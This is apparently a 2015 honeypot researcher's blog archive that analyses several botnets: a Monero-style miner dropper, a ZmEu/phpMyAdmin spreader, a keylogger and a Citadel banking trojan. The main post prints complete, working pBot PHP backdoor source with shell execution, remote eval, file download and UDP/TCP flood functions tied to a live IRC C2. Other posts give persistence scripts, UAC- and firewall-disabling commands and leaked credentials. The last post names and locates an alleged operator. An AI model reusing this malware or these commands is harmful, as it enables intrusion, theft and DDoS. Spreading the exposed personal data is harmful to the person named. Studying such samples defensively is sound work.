
Saturday, January 31, 2015

Miner Spreading over Zmeu

Infected machine had its CPU pegged at 100%. The binary's execution directory was C:\appserv\phpmyadmin\; following the logs, the host was compromised through the phpMyAdmin (pma) exploit.


init.exe - SFX archive that extracts and calls a second SFX archive named sys.exe

sys.exe

run.bat
@ECHO OFF
REM Stage-2 launcher dropped by sys.exe: kill the dropper (init.exe) that extracted us,
REM use ping to localhost as a ~2 second sleep, then run geox.exe with the argument -pula
REM (the meaning of that argument is not shown in this listing).
REM Note: "init.exe" is also the file name of the miner binary dropped later, so
REM taskkill /IM init.exe would terminate either process if it were running.
START /WAIT /B taskkill /F /IM init.exe > nul
ping -n 3 -w 2 127.0.0.1 > nul
call geox.exe -pula
:end
geox.exe

run.bat - imports the registry persistence, launches the payload, and sets the hidden/system attributes on the drop folder
@ECHO OFF
REM Installer stage from geox.exe. Drop directory is %SystemRoot%\init (C:\Windows\init).
REM setx persists these as user environment variables. Names of this form are typically
REM read by GPU (OpenCL) miners, which is consistent with the mining payload below, but
REM that cannot be confirmed from this listing alone.
setx GPU_MAX_ALLOC_PERCENT 100
setx GPU_USE_SYNC_OBJECTS 1
REM Silently (/s) import the persistence .reg file, then launch "bash" (an executable
REM with no extension shown), once from a 32-bit and once from a 64-bit drop folder.
REM Writing HKLM via regedit needs elevated rights; presumably the compromised web
REM server process had them -- not verifiable here.
START /WAIT /B regedit /s %SystemRoot%\init\spoolv32\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv32\bash
START /WAIT /B regedit /s %SystemRoot%\init\spoolv64\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv64\bash
REM Hide the drop folder (+H hidden, +S system) so Explorer does not show it by default.
START attrib +H +S %SystemRoot%\init
reg.reg - registers the payload for startup (an HKLM Run entry plus a service named "svchost"); note that it first deletes the entire HKLM Run key
 

Windows Registry Editor Version 5.00

; "[-KEY]" deletes the key and everything beneath it before the keys are recreated below.
; Deleting the whole HKLM\...\CurrentVersion\Run key wipes every legitimate machine-wide
; autostart entry on the box -- expect them to be missing during incident response.
[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

; A service named "svchost" (masquerading as the genuine svchost.exe). The
; Application/AppDirectory value pair under Parameters is the layout consumed by
; srvany-style service wrappers, so "bash" is presumably such a wrapper -- not shown in
; this listing, and the service itself is not created by this file. AppDirectory is
; set to the .lnk path rather than to a directory.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
"AppDirectory"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""

; Second persistence mechanism: HKLM Run entry "spoolv" pointing at the same shortcut.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolv"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""


bash.lnk - shortcut that starts the miner with the following command line: pool stratum.wemineftc.com:80, worker geox.1, password x (the -O user:pass argument)
%SystemRoot%\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\init\spoolv32" /HIGH "%SystemRoot%\init\spoolv32\init.exe -o stratum+tcp://stratum.wemineftc.com:80 -O geox.1:x"


init.exe - the miner executable itself (it also responds to a help command).



VirusTotal / Malwr reports (links not preserved in this copy)

Wednesday, January 28, 2015

pBot - 167.114.128.120 - IRC


Honeypot Logs












LOL




He uses the ZmEu scanner and the phpMyAdmin exploit to spread a PHP botnet.
Here is the bot script:

<?php
// Bot preamble: never time out, suppress all error output, and keep running after the
// HTTP client disconnects -- a single exploit request leaves a long-lived process.
set_time_limit(0); 
error_reporting(0);
ignore_user_abort(true);

// Neither $dir nor this global $uname is referenced again anywhere in this listing.
$dir = getcwd();
$uname= @php_uname();

/**
 * Find a writable scratch directory for command-output capture files.
 *
 * Probes, in order: /tmp, /usr/tmp, /var/tmp, %USERPROFILE%, %ALLUSERSPROFILE%,
 * session.save_path, upload_tmp_dir, then %TMP%/%TEMP%; falls back to '.'.
 * The Unix paths are tried first even though the only callers (srvshelL/ffishelL)
 * are Windows-only and append a backslash to the result.
 *
 * @return string directory path, or '.' if nothing writable was found
 */
function whereistmP()
{
        $uploadtmp=ini_get('upload_tmp_dir');
        $uf=getenv('USERPROFILE');
        $af=getenv('ALLUSERSPROFILE');
        $se=ini_get('session.save_path');
        $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
        if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
        if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
        if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
        if(is_dir($uf) && is_writable($uf))return $uf;
        if(is_dir($af) && is_writable($af))return $af;
        if(is_dir($se) && is_writable($se))return $se;
        if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
        if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
        return '.';        
}
/**
 * Execute a shell command via the win32service PECL extension: register a throw-away
 * Windows service whose binary is cmd.exe, start/stop/delete it, and read the output
 * file it redirected to.
 *
 * Why this matters: the command runs under the account the Service Control Manager
 * assigns to the service (presumably LocalSystem by default -- confirm for the PHP
 * version in question), not under the web-server account, so it doubles as privilege
 * escalation whenever the extension is loaded and the caller may create services.
 *
 * Observations: ComSpec fallback is hard-coded to the D: drive; the wait loop has no
 * timeout, so if the service never writes $name the bot hangs forever.
 *
 * @param string $command command line passed to cmd.exe /c
 * @return string captured stdout of the command
 */
function srvshelL($command)
{
        $name=whereistmP()."\\".uniqid('NJ');
        $n=uniqid('NJ');
        $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
        win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
        win32_start_service($n);
        win32_stop_service($n);
        win32_delete_service($n);
        // Unbounded wait for the redirected output file to appear.
        while(!file_exists($name))sleep(1);
        $exec=file_get_contents($name);
        unlink($name);
        return $exec;
}
/**
 * Execute a shell command through the PECL ffi extension by calling kernel32!WinExec
 * directly (SW = 0, i.e. hidden window) and reading the redirected output file.
 *
 * Same unbounded wait loop as srvshelL(): if WinExec fails (the $res return value is
 * never checked) the bot blocks forever on file_exists().
 *
 * @param string $command command line passed to cmd.exe /c
 * @return string captured stdout of the command
 */
function ffishelL($command)
{
        $name=whereistmP()."\\".uniqid('NJ');
        $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
        $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
        while(!file_exists($name))sleep(1);
        $exec=file_get_contents($name);
        unlink($name);
        return $exec;
}
/**
 * Execute a shell command through a COM shell object passed in as $ws (the ->exec()
 * / ->StdOut()->ReadAll() calls match the WScript.Shell interface) and return its stdout.
 *
 * Dead code in this listing: Exe() never calls comshelL(), and nothing constructs $ws.
 *
 * @param string $command command line passed to cmd.exe /c
 * @param object $ws      COM shell object exposing exec()
 * @return string captured stdout of the command
 */
function comshelL($command,$ws)
{
        $exec=$ws->exec("cmd.exe /c $command");
        $so=$exec->StdOut();
        return $so->ReadAll();
}
/**
 * Execute a shell command via the embedded Perl extension: eval() a Perl system()
 * call and capture what it prints through PHP's output buffering.
 *
 * $command is interpolated into a double-quoted Perl string with no escaping, so a
 * command containing a quote or "$"/"@" sigil will break or alter the Perl code.
 *
 * @param string $command shell command passed to Perl's system()
 * @return string captured output
 */
function perlshelL($command)
{
        $perl=new perl();
        ob_start();
        $perl->eval("system(\"$command\")");
        $exec=ob_get_contents();
        ob_end_clean();
        return $exec;
}
/**
 * Run a shell command through whichever execution primitive PHP still exposes, trying
 * them in order, and return the captured output.
 *
 * Observations on this listing:
 *  - the system() branch returns $tmp (the output-buffer contents captured BEFORE the
 *    command ran) and discards $output, so it yields nothing useful;
 *  - the popen() branch overwrites $exec on every fgets(), so only the last line survives;
 *  - winshelL() is referenced but not defined anywhere in this listing;
 *  - comshelL() is defined above but never called from here;
 *  - $dep describes stdin/stdout only, so the proc_open() branch never captures stderr.
 *
 * Defenders: disable_functions covering passthru/system/exec/shell_exec/popen/proc_open
 * does not stop the win32service, ffi or perl extension fallbacks if those are loaded.
 *
 * @param string $command shell command to execute
 * @return string captured output ('' if no primitive was available)
 */
function Exe($command)
{
        $exec=$output='';
        $dep[]=array('pipe','r');$dep[]=array('pipe','w');
        if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
        // BUG (original): $exec=$tmp returns the pre-command buffer; the real output in $output is dropped.
        elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
        elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
        elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
        // Only the last line read survives here ($exec is reassigned, not appended).
        elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
        elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
        // winshelL() does not exist in this listing; this branch would fatal if reached.
        elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
        elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
        elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
        elseif(extension_loaded('perl'))$exec=perlshelL($command);
        return $exec;
}

/**
 * pBot: IRC-controlled PHP backdoor as recovered from the honeypot.
 *
 * Capabilities visible in this listing: arbitrary shell execution (via Exe()), arbitrary
 * PHP eval(), sending mail, DNS lookups, downloading any URL to any local path, switching
 * the C2 server, and UDP/TCP flooding.
 *
 * NOTE(review): several string literals in this listing (switch labels, message
 * prefixes, nick decorations) are blank or a single space; the original command names
 * appear to have been stripped when the post was published. As printed, switch($cmd[1])
 * only matches the literal " ", and the duplicated `case " ":` labels mean only the first
 * of them (the mail branch) is reachable. Treat the structure, not the exact strings, as
 * the evidence, and confirm against the pastebin copies referenced later in the post.
 *
 * Security-relevant: $config['hostauth'] is never compared against the sender's host
 * anywhere in this class, so any user able to speak in the channel can drive the bot.
 * $users is declared but never read or written.
 */
class pBot
{
 // C2: 167.114.128.120:6668, channel #Boxes. 'trigger' and 'hostauth' are never consulted (see main()).
 var $config = array("server"=>"167.114.128.120", "port"=>"6668","key"=>"","prefix"=>"", "maxrand"=>"5", "chan"=>"#Boxes","trigger"=>".","hostauth"=>"god.net"); 
 var $users = array(); 
 /**
  * Connect loop: open the C2 socket, register (USER line leaks php_uname()), pick a nick,
  * then hand off to main(). On a failed fsockopen() it recurses into start() with no
  * delay and no bound; when main() returns it loops and reconnects.
  */
 function start()
 {
    while(true)
 {
     if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start(); 
     $ident = $this->config['prefix'];
     $alph = range("0","9");
     for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,9)];
     $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
     $this->set_nick();
     $this->main();
 }
}
 /**
  * Read/dispatch loop. Handles server PING, joins the channel on 001, re-nicks on 433,
  * then parses channel traffic for "."-prefixed commands.
  */
 function main()
 {
    while(!feof($this->conn))
    {
 // Keep-alive: if nothing arrives within 30s, send a PING; if still silent after another 30s, drop the connection.
 if(function_exists('stream_select'))
 {
 $read = array($this->conn);
 $write = NULL;
 $except = NULL;
 $changed = stream_select($read, $write, $except, 30);
 if($changed == 0)
 {
  fwrite($this->conn, "PING :lelcomeatme\r\n");
  $read = array($this->conn);
         $write = NULL;
         $except = NULL;
         $changed = stream_select($read, $write, $except, 30);
  if($changed == 0) break;
 }
 }
       $this->buf = trim(fgets($this->conn,512)); 
       $cmd = explode(" ",$this->buf); 
       if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
       if(isset($cmd[1]) && $cmd[1] =="001") { $this->join($this->config['chan'],$this->config['key']); continue; } 
       if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); continue; }
       // $old_buf is never assigned in this listing, so this condition is always true.
       if($this->buf != $old_buf) 
       { 
          $mcmd = array(); 
          $msg = substr(strstr($this->buf," :"),2); 
          $msgcmd = explode(" ",$msg); 
          // Sender parsing. $vhost (the user@host part) is computed but never checked against $config['hostauth'].
          $nick = explode("!",$cmd[0]); 
          $vhost = explode("@",$nick[1]); 
          $vhost = $vhost[1]; 
          $nick = substr($nick[0],1); 
          $host = $cmd[0]; 
          // If the message is addressed to the bot's nick, shift the command words left by one.
          if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
          else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];

          if(count($cmd)>2) 
          { 
             // Dispatch on the IRC verb. The label is blank in this listing (presumably the PRIVMSG verb originally).
             switch($cmd[1]) 
             {
                case " ": 
                   if(true) 
                   {
                      // Commands are prefixed with a literal "."; $config['trigger'] is not used.
                      if(substr($mcmd[0],0,1)==".") 
                      { 
                         // Command names below were stripped in this copy; only the first `case " ":` can match.
                         switch(substr($mcmd[0],1)) 
                         {
                            // mail <to> <from> <subject> <body...>: spam relay, every field attacker-controlled.
                            case " ":
                               if(count($mcmd)>4) 
                               { 
                                  $header = "From: <".$mcmd[2].">"; 
                                  if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
                                  } 
                                  else 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2mail\2]: sent."); 
                                  } 
                               } 
                            break;
                            // dns <ip|name>: reverse lookup if the argument looks like a dotted quad, else forward lookup.
                            case "dns": 
                               if(isset($mcmd[1])) 
                               { 
                                  $ip = explode(".",$mcmd[1]); 
                                  if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); 
                                  } 
                                  else 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); 
                                  } 
                               } 
                            break;
                            // info: report php_uname() and whether safe_mode is on.
                            case " ":
                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
                               else { $safemode = "off"; }
                               $uname = php_uname();
                               $this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
                            break;
                            // re-nick.
                            case " ": 
                               $this->set_nick(); 
                            break; 
                            // raw: forward the rest of the message verbatim to the IRC server.
                            case " ":
                               $this->send(strstr($msg,$mcmd[1])); 
                            break; 
                            // eval: execute arbitrary PHP taken from the channel message; output is echoed back line by line.
                            case " ":
   
           ob_start();
                                eval(strstr($msg,$mcmd[1]));
           $exec=ob_get_contents();
    ob_end_clean();
                               $ret = explode("\n",$exec);
                               for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                            break;
                            // exec: run an arbitrary shell command through Exe() and echo its output.
                            case " ": 
                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                               $exec = Exe($command); 
                               $ret = explode("\n",$exec);
                               for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                            break;
                            // update <server> <port> [pass]: switch C2 and close the socket so start() reconnects.
                            case " ": 
                               if(count($mcmd)>2) 
                               { 
                                  $this->config['server'] = $mcmd[1]; 
                                  $this->config['port'] = $mcmd[2]; 
                                  // BUG (original): "$mcmcd" is a typo, so this branch never runs and 'pass' is never stored.
                                  if(isset($mcmcd[3])) 
                                  { 
                                   $this->config['pass'] = $mcmd[3]; 
                                   $this->privmsg($this->config['chan'],"[\2update\2]: info updated ".$mcmd[1].":".$mcmd[2]." pass: ".$mcmd[3]); 
                                  } 
                                  else 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2update\2]: switched server to ".$mcmd[1].":".$mcmd[2]); 
                                  }
      fclose($this->conn);    
                               } 
                            break; 
                            // download <url> <path>: fetch any URL (file() honours allow_url_fopen) and write it to any path.
                            case " ": 
                               if(count($mcmd) > 2) 
                               { 
                                  if(!$fp = fopen($mcmd[2],"w")) 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2download\2]: could not open output file."); 
                                  } 
                                  else 
                                  { 
                                     if(!$get = file($mcmd[1])) 
                                     { 
                                        $this->privmsg($this->config['chan'],"[\2download\2]: could not download \2".$mcmd[1]."\2"); 
                                     } 
                                     else 
                                     { 
                                        // Off-by-one (<=): the last iteration writes an undefined element (empty string).
                                        for($i=0;$i<=count($get);$i++) 
                                        { 
                                           fwrite($fp,$get[$i]); 
                                        } 
                                        $this->privmsg($this->config['chan'],"[\2download\2]: file \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2");
                                     } 
                                     fclose($fp); 
                                  } 
                               }
                               else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
                            break;
                            // DDoS primitives. tcpconn requires more than 5 words but only passes 3 of them on.
                            case "udpflood": 
                               if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); } 
                            break; 
                            case "tcpconn": 
                               if(count($mcmd)>5) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); } 
                            break;
                         } 
                      } 
                   } 
                break; 
             } 
          } 
       }
    } 
 } 
 // Raw IRC line writers (CRLF-terminated).
 function send($msg) { fwrite($this->conn,$msg."\r\n"); } 
 function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); } 
 function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
 function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
 /**
  * Build and announce a nick. In this listing both OS branches append "Linux|" and every
  * server-software decoration is an empty string, so the nick is "Linux|" + prefix +
  * maxrand random digits.
  */
 function set_nick()
 {
    $this->nick = "";
    if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->nick .= "Linux|";
    else $this->nick .= "Linux|";
    if(isset($_SERVER['SERVER_SOFTWARE']))
    {
       if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) $this->nick .= ""; 
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) $this->nick .= ""; 
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) $this->nick .= ""; 
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"nginx")) $this->nick .= ""; 
       else $this->nick .= ""; 
    }
    else
    {
       $this->nick .= "";
    }
    $this->nick .= $this->config['prefix']; 
    for($i=0;$i<$this->config['maxrand'];$i++) $this->nick .= mt_rand(0,9); 
    $this->send("NICK ".$this->nick);
 } 
  /**
   * UDP flood: send a $packetsize-byte random payload to $host:$port (or a comma-separated
   * list of hosts, round-robin) for $time seconds, then report MB sent and MB/s. The
   * fsockopen() results are never checked. chr(rand(1,256)) yields "\0" for 256, since
   * chr() wraps modulo 256. The two status messages are blank in this listing.
   */
  function udpflood($host,$port,$time,$packetsize) {
 $this->privmsg($this->config['chan'],""); 
 $packet = "";
 for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
 $end = time() + $time;
 $multitarget = false;
 if(strpos($host, ",") !== FALSE)
 {
  $multitarget = true;
  $host = explode(",", $host);
 }
 $i = 0;
 if($multitarget)
 {
  $fp = array();
  foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);

  $count = count($host);
  while(true)
  {
         fwrite($fp[$i % $count],$packet);
   fflush($fp[$i % $count]);
   // The deadline is only checked every 100 packets.
   if($i % 100 == 0)
   {
    if($end < time()) break;
   }
   $i++;
  }

         foreach($fp as $fpp) fclose($fpp);
 } else {
  $fp = fsockopen("udp://".$host,$port,$e,$s,5);
  while(true)
  {
         fwrite($fp,$packet);
   fflush($fp);
   if($i % 100 == 0)
   {
    if($end < time()) break;
   }
   $i++;
  }
         fclose($fp);
 }
 $env = $i * $packetsize;
 $env = $env / 1048576;
 $vel = $env / $time;
 $vel = round($vel);
 $env = round($env);
 $this->privmsg($this->config['chan'],"".$env."".$vel."");
}
 /**
  * TCP connection flood: open and immediately close connections to $host:$port
  * (1 s connect timeout) until $time seconds have elapsed; reports the attempt count.
  * The fsockopen() result is passed to fclose() without checking for failure.
  */
 function tcpconn($host,$port,$time) 
 { 
    $this->privmsg($this->config['chan'],"[\2TcpConn Started!\2]"); 
    $end = time() + $time;
    $i = 0;
    while($end > time())
    {
 $fp = fsockopen($host, $port, $dummy, $dummy, 1);
 fclose($fp);
        $i++;
    }
    $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: sent ".$i." connections to $host:$port."); 
 }
} 
// Entry point: instantiate and block forever in the connect loop.
$bot = new pBot; 
$bot->start(); 
?>

Tuesday, January 27, 2015

ragebot - 61.236.93.74 - IRC

Server : 61.236.93.74 
// hxxp://whois.domaintools.com/61.236.93.74
Port : 6667/tcp  open irc Unreal ircd
Channels : #g0tme# , #pwned#
// traffic observed on that channel
<< MODE raGe|iuxwTmMNJS :+iwG
>> JOIN #g0tme#
<< JOIN :#g0tme#
<< 332 raGe|iuxwTmMNJS #g0tme# :!xpl 94 1 222.x.x.x 3 1 222.x.x.x 3 1
<< 333 raGe|iuxwTmMNJS #g0tme# root 1422314449
>> PRIVMSG #g0tme# :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 222.x.x.x with 94 threads. (autorooting)
<< 404 raGe|iuxwTmMNJS #g0tme# :You must have a registered nick (+r) to talk on this channel (#g0tme#)
// runs under the process name system32dll.exe
// bot commands: botinfo/rarworm/xpl/p2p/vncstop/disconnect/reconnect/nick/restart/part/join/
// host auth is stored as an MD5 hash: 630e20d41ee020459be07f5e8b7810dc, which the author resolves to root.edu
// the delete and download commands are also MD5-hashed: 099af53f601532dbd31e0ea99ffdeb64 = delete, fd456406745d816a45cae554c788e754 = download (author's resolution)
// passwords used by the VNC brute-forcer:
11111111
12345678
1234567
123456

Plain binary and a report: search Malwr for the MD5 81062eeec1984689b90fc38dc1bfcc6b

Saturday, January 24, 2015

Keylogger - 77.221.130.21



Creates reports (running processes, logged keystrokes and visited URLs) and uploads them over plaintext FTP to the following server; the credentials below were recovered from the capture:

Server : 77.221.130.21 Port : 21
USER z92681.
PASS MzG5k6N2n..
OPTS utf8 on..
PWD..CWD /lo/..
// user and pass block embedded in the sample (base64-looking, presumably encrypted; not decoded here)
0K9dg2kQEl+THDzDsftcRA==
1.0.0.0
127.0.0.1 
3drRPuLbQmixloQTAAYA1g==
// startup command -- note it also disables UAC (EnableLUA = 0), so subsequent privileged actions do not prompt
.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

// Sample and Malwr report: search for the MD5 3b56c66455c3b1a82bcd56da18df9c38

Wednesday, January 14, 2015

22k ZmEu Botnet

On my honeypot I found this connection; an IRC server was running on that host.



Connecting to that port ...


- Let's check the security of his server... oh.



Also, many connections to the port the IRC server is listening on.


Got his config; let's join the IRC server...


Many bots! 26k


/list

The two admins' IP addresses

Next I checked some logs from the infected PCs and found this ...

He is also spreading via a script that searches for MySQL/PHP admin panels with weak or no password and infects them too (/panel/script/setup.php). The tool, used by HF script kiddies, is called ZmEu masscan; more on that later.
14.35.234.212 was his scanning / spreading server.
Let's see whether that one is better secured ... lolz

As you can see, it is a Perl script that attacks a filtered list of IP addresses exposing a phpMyAdmin panel (or otherwise vulnerable) | ps aux

I located his scripts under /bin/.php/.
I will attach an archive with all of his data later.
All the *.txt files are lists of exposed phpMyAdmin panels that may be exploitable.


cat all.pl 
http://pastebin.com/JZnMHGGE
i paste just this here 
# Excerpt from all.pl (the ZmEu/phpMyAdmin spreader). $host is assigned earlier in the
# script, outside this excerpt.
my $url = $host;
# Payload location pushed to every exploited host: a PHP IRC bot (0.php) fetched over FTP.
my $ftp = "ftp://185.4.29.127/a/0.php";
# Byte length of the FTP URL; how it is consumed (e.g. a length field in the exploit
# request) is not visible in this excerpt.
my $len = length($ftp);
every exploited machine is forced to download this file over FTP
cat 0.php
http://pastebin.com/g75MAgjz
it is a PHP IRC bot (same pBot family as above); its C2 config:
    "server" => "222.216.30.28",
    "port" => "3131",
    "key" => "*",
    "prefix" => "",
    "maxrand" => "8",
    "chan" => "#dd0s#",
    "trigger" => ".",
    "hostauth" => "root.edu"
there are some other files
cat a.php 
http://pastebin.com/CKs5fRkv
cat ax.php
http://pastebin.com/GC3dcuyz
cat win.php
http://pastebin.com/3Np2JsYw

- All data will be attached soon as an archive.
More about the pma bot here.

Sunday, January 4, 2015

Citadel - cynthialemos1225.ddns.net ( Richy Adams ) - Exposed



// config.php (excerpt; the "......" line marks elided content). Note the MySQL root password and botnet crypt key stored in plaintext.
$config = array (
  'mysql_host' => 'localhost',
  'mysql_user' => 'root',
  'mysql_pass' => 'qwerty23456@',
  'mysql_db' => 'tenna',
  'reports_path' => '_reports1190699691',
  'reports_to_db' => 1,
  'reports_to_fs' => 0,
  'reports_geoip' => 0,
  'jabber' => 
  array (
    'host' => '',
    'login' => '',
    'pass' => '',
    'port' => 5222,
  ),
  'reports_jn' => 0,
  'reports_jn_logfile' => '_reports1190699691/jabber.log',
......
  ),
  'allowed_countries_enabled' => 0,
  'allowed_countries' => '',
  'botnet_timeout' => 1500,
  'botnet_cryptkey' => 'sgasgdsgdshwgrekhgjlksdng',
);
$config['botnet_cryptkey_bin'] = array(200, 56, 101, 2, 42, 30, 79, 114, 114, 231, 90, 185, 178, 234, 43, 113, 77, 215, 74, 251, 72, 147, 112, 209, 143, 3, 221, 34, 213, 155, 59, 1, 102, 95, 251, 64, 4, 6, 37, 10, 88, 115, 111, 203, 37, 251, 237, 91, 59, 186, 76, 153, 210, 127, 255, 187, 176, 187, 202, 17, 228, 83, 73, 72, 124, 73, 129, 105, 86, 226, 91, 206, 125, 149, 142, 159, 128, 61, 189, 143, 202, 109, 63, 124, 118, 48, 176, 36, 177, 181, 123, 0, 242, 220, 30, 100, 232, 246, 146, 150, 224, 233, 252, 198, 250, 44, 26, 146, 38, 153, 1, 249, 208, 171, 247, 133, 20, 117, 173, 227, 152, 170, 248, 62, 39, 119, 169, 200, 110, 65, 11, 164, 164, 19, 183, 7, 133, 13, 238, 205, 87, 28, 86, 60, 67, 222, 16, 128, 64, 138, 200, 81, 75, 12, 62, 240, 23, 168, 201, 190, 47, 180, 95, 214, 218, 206, 128, 162, 169, 78, 44, 174, 116, 45, 161, 245, 27, 142, 18, 86, 92, 195, 155, 78, 248, 150, 58, 54, 14, 174, 88, 211, 197, 35, 19, 142, 10, 99, 5, 33, 137, 161, 65, 175, 51, 91, 107, 201, 193, 40, 150, 218, 105, 129, 115, 168, 41, 57, 244, 108, 29, 130, 231, 141, 236, 214, 182, 177, 9, 21, 229, 57, 90, 100, 140, 106, 93, 217, 213, 158, 221, 17, 38, 98, 165, 123, 199, 76, 223, 239, 154, 110, 16, 229, 190, 4);
return $config;


config.txt (from the Citadel builder)
entry "StaticConfig"
  botnet "CIT"
  timer_config 4 9
  timer_logs 3 6
  timer_stats 4 8
  timer_modules 1 4
  timer_autoupdate 8
  url_config1 "http://richyadams.zapto.org/xampp/link/config.bin"
  
  remove_certs 1
;  disable_tcpserver 0
  disable_cookies 0
  encryption_key "jzhbfgjdhbgjhddkjgskdj"
  report_software 1
  enable_luhn10_get 0
  enable_luhn10_post  1
  disable_antivirus 0
  use_module_video 1
  antiemulation_enable 0
  disable_httpgrabber 0
  use_module_ffcookie 1
end
entry "DynamicConfig"
  url_loader "http://richyadams.zapto.org/xampp/link/soft.exe"
  url_server "http://richyadams.zapto.org/xampp/link/gate.php"
  file_webinjects "injects.txt"
  url_webinjects "http://richyadams.zapto.org/xampp/link/file.php"
  entry "AdvancedConfigs"
    "http://richyadams.zapto.org/xampp/link/config.bin"
 "http://richyadams.zapto.org/xampp/link/config.bin"
  end
  entry "WebFilters"
    "#*wellsfargo.com/*"
    "@*payment.com/*"
    "!http://*.com/*.jpg"
  end
  entry HttpVipUrls
    "*facebook.com/*"
  end
  entry "WebDataFilters"
  end
  entry "WebFakes"
  end
  entry "CmdList"
    "hostname"
    "tasklist"
    "ipconfig /all"
 "netsh firewall set opmode disable"
  end
  entry "Keylogger"
    processes "bank.exe;java.exe"
    time 3
  end
  entry "Video"
    quality 1
    length 600
  end
end

Not many bots Richy ..

// The admin's IP address, taken from the panel access log (the Referer points at the panel's cp.php):
41.138.188.121 - - [02/Jan/2015:21:46:00 +0100] "GET /xampp/link/cp.php?m=home HTTP/1.1" 200 224893 "http://cynthialemos1225.ddns.net/xampp/link/cp.php?m=home" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"




His location based on the IP
and here is a pic of him




luv ur pix too !!